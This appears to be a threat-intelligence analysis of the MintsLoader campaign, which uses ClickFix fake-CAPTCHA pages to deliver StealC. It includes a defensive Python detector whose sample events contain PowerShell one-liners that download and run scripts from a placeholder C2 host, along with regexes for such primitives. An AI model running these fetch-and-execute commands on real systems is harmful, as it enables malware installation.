Full Report
Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC. "MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,"
Analysis Summary
# Tool/Technique: MintsLoader
## Overview
MintsLoader is a malware loader, primarily based on PowerShell, used in an ongoing campaign to distribute secondary payloads, notably the StealC information stealer and the BOINC network computing platform. It is often delivered via spam emails linking to Kongtuke/ClickFix pages or through an obfuscated JScript file.
## Technical Details
- Type: Malware Loader
- Platform: Windows (implied by PowerShell usage)
- Capabilities: Download and execute secondary payloads, sandbox evasion, resistance to analysis, C2 communication via DGA.
- First Seen: Activity detected in early January 2025.
## MITRE ATT&CK Mapping
*Note: Mappings are inferred based on described functionality (loading, defense evasion, C2 communication).*
- **TA0001 - Initial Access**
  - T1566 - Phishing
    - T1566.001 - Spearphishing Attachment (via initial spam email/JS download)
- **TA0002 - Execution**
  - T1059 - Command and Scripting Interpreter
    - T1059.001 - PowerShell
- **TA0005 - Defense Evasion**
  - T1027 - Obfuscated Files or Information (used in the initial JScript/loader)
- **TA0011 - Command and Control**
  - T1568 - Dynamic Resolution
    - T1568.002 - Domain Generation Algorithms
## Functionality
### Core Capabilities
- Initial delivery via spam emails linking to Kongtuke/ClickFix style pages or direct download of an obfuscated JScript file.
- Executes a PowerShell command to download and run the core MintsLoader payload via `curl`.
- Self-deletes after execution to remove traces.
- Contacts a C2 server to fetch interim PowerShell payloads.
### Advanced Features
- **Sandbox and Analysis Evasion:** Performs various checks to detect and resist analysis attempts (sandboxes).
- **Domain Generation Algorithm (DGA):** Uses a DGA whose seed incorporates the current day of the month to generate the C2 domain names, so the contacted domains change daily.
## Indicators of Compromise
*Note: Specific hashes, file names, and precise C2 indicators are not provided in the source text.*
- File Hashes: [N/A in source]
- File Names: [N/A in source, likely obfuscated]
- Registry Keys: [N/A in source]
- Network Indicators: C2 servers resolved via DGA (seed based on day of month); no specific domains are given in the source.
- Behavioral Indicators: PowerShell execution that downloads the loader via `curl`, self-deletion after execution, and DNS/C2 traffic matching DGA patterns.
## Associated Threat Actors
- Unknown (Associated with the campaign targeting electricity, oil and gas, and legal sectors in the US and Europe).
## Detection Methods
- Signature-based detection: Detecting known PowerShell download/execution artifacts associated with this tool.
- Behavioral detection: Monitoring for suspicious PowerShell execution chains initiated by initial access vectors (email links/JScript). Monitoring for DGA-related network patterns.
- YARA rules: [N/A in source]
## Mitigation Strategies
- Spam filtering and user training to avoid clicking links in suspicious emails.
- Implementing robust endpoint detection and response (EDR) to monitor PowerShell command-line arguments and script block logging.
- Network defense systems looking for DGA communication patterns.
- (Related to delivery via Kongtuke/ClickFix) Educating users on techniques that trick them into pasting and executing scripts in the Run prompt.
## Related Tools/Techniques
- **StealC:** Secondary payload distributed by MintsLoader.
- **BOINC:** Secondary payload sometimes distributed by MintsLoader.
- **Kongtuke/ClickFix:** Delivery mechanism often leveraged to get the user to execute the initial access script.
---
# Tool/Technique: StealC
## Overview
StealC is an information stealer malware sold under the Malware-as-a-Service (MaaS) model. It is being deployed as a secondary payload by MintsLoader in recent campaigns.
## Technical Details
- Type: Malware (Information Stealer)
- Platform: Windows (implied)
- Capabilities: Stealing sensitive information.
- First Seen: Sold as MaaS since early 2023.
## MITRE ATT&CK Mapping
*Note: Mappings are inferred based on the description of an information stealer.*
- **TA0009 - Collection**
  - T1005 - Data from Local System
## Functionality
### Core Capabilities
- Collects sensitive information from compromised systems.
- Distributed via MintsLoader loader malware.
### Advanced Features
- Re-engineered from another stealer known as [Arkei](https://thehackernews.com/2023/06/darkvault-malware-stealer-evolution.html).
- **Geofencing:** Avoids infecting machines located in Russia, Ukraine, Belarus, Kazakhstan, or Uzbekistan.
## Indicators of Compromise
- File Hashes: [N/A in source]
- File Names: [N/A in source]
- Registry Keys: [N/A in source]
- Network Indicators: Implied C2 communication for exfiltration; no specific addresses are given in the source.
- Behavioral Indicators: File access and data staging indicative of credential or data theft.
## Associated Threat Actors
- Consumers of the Malware-as-a-Service offering.
## Detection Methods
- Signature-based detection: Targeting known file hashes or binaries for StealC.
- Behavioral detection: Monitoring for access patterns typical of credential harvesting.
## Mitigation Strategies
- Robust monitoring to detect the deployment of commodity MaaS stealers by loaders such as MintsLoader.
- Implementing application whitelisting to control execution of unknown executables.
## Related Tools/Techniques
- **MintsLoader:** Loader used for deployment.
- **Arkei:** Predecessor/base for StealC.
---
# Technique: ClickFix / Kongtuke Co-option
## Overview
ClickFix and Kongtuke refer to social engineering techniques used to trick users into manually copying and pasting malicious PowerShell scripts into the Windows Run dialog box (`Win+R`) for execution. This is often done by displaying fake CAPTCHA verification prompts.
## Technical Details
- Type: Initial Access / Execution Technique
- Platform: Windows
- Capabilities: Bypassing standard security controls by leveraging user interaction to execute code via the Run prompt.
- First Seen: Part of a spike in associated malicious campaigns (context implies recent relevance, early 2025).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1566 - Phishing (specifically leveraging deceptive UIs)
- **TA0002 - Execution**
  - T1059 - Command and Scripting Interpreter
    - T1059.001 - PowerShell (the executed payload)
## Functionality
### Core Capabilities
- Websites displaying fake "verify you are human" pages after a user clicks a link from a spam email.
- Placing a malicious PowerShell command on the user's clipboard when they interact with the page.
- Providing explicit instructions to the user to paste and execute this script in the Run window.
### Advanced Features
- Dynamic loading of fake forum content from an external server ("mothership") in the case of GootLoader (though the technique is described broadly here).
## Indicators of Compromise
- Behavioral Indicators: User interaction leading to execution of code pasted directly into the Run prompt, especially following interaction with phishing links.
## Associated Threat Actors
- Threat actors utilizing MintsLoader.
- Used in campaigns abusing fake CAPTCHA prompts.
## Detection Methods
- Behavioral detection: Monitoring for execution of scripts or commands originating from the Run dialog (`cmd.exe` or `powershell.exe` parented by `explorer.exe` or Run dialog context).
- EDR monitoring of script block logging for pasted content being executed.
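A minimal detection over process-creation telemetry that covers both the MintsLoader behavioral indicators (PowerShell downloading via `curl` and executing the result) and the Run-dialog parent/child pattern described here. This is added example code, not from the report or any vendor; the event fields and sample command lines are constructed to resemble EDR/Sysmon-style records.

```python
import re

# Constructed sample process-creation events (parent image, image, command line);
# these imitate EDR/Sysmon-style telemetry and are not taken from the report.
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     'powershell -w hidden -c "curl http://c2.example.invalid/l.ps1 -o a.ps1; iex (gc a.ps1)"'),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\cmd.exe",
     'cmd /c "powershell -ep bypass -c iwr http://c2.example.invalid/x | iex"'),
    ("C:\\Program Files\\Vendor\\agent.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -File C:\\Scripts\\inventory.ps1"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe", "notepad.exe"),
]

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")
# Primitives typical of ClickFix/MintsLoader one-liners: fetch remote content, then run it.
DOWNLOAD_RE = re.compile(r"\b(curl|wget|iwr|invoke-webrequest|downloadstring|net\.webclient)\b", re.I)
EXECUTE_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
EVASION_RE = re.compile(r"-(w(indowstyle)?\s+hidden|e(xecutionpolicy|p)\s+bypass|enc(odedcommand)?\b)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the matched indicators for one event, or [] if it looks benign.
    Only shells launched by explorer.exe count: that is how a Win+R Run-dialog
    launch appears in process telemetry, while a vendor agent running a
    scheduled script (event 3) should not trip the rule."""
    parent, image, cmdline = event
    if basename(parent) != "explorer.exe" or basename(image) not in SHELLS:
        return []
    hits = []
    if DOWNLOAD_RE.search(cmdline):
        hits.append("download")
    if EXECUTE_RE.search(cmdline):
        hits.append("execute")
    if EVASION_RE.search(cmdline):
        hits.append("evasion")
    # Require download plus execute; evasion flags alone are common in admin scripts.
    return hits if {"download", "execute"} <= set(hits) else []


def analyze(events):
    """Return (image basename, indicators) for every event that matches."""
    return [(basename(e[1]), classify(e)) for e in events if classify(e)]
```

Tune the regexes to your environment's script-block and command-line logging; the parent check is the part that distinguishes a Run-dialog launch from routine automation.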
## Mitigation Strategies
- User education emphasizing the extreme danger of pasting and executing unknown scripts sourced from web pages, even in the Run dialog.
- Restricting use of the Run dialog for non-standard operations if feasible in the environment.
## Related Tools/Techniques
- **MintsLoader** (Distributed via this path).
- **GootLoader campaigns** (Utilize similar deceptive hosting to lure execution).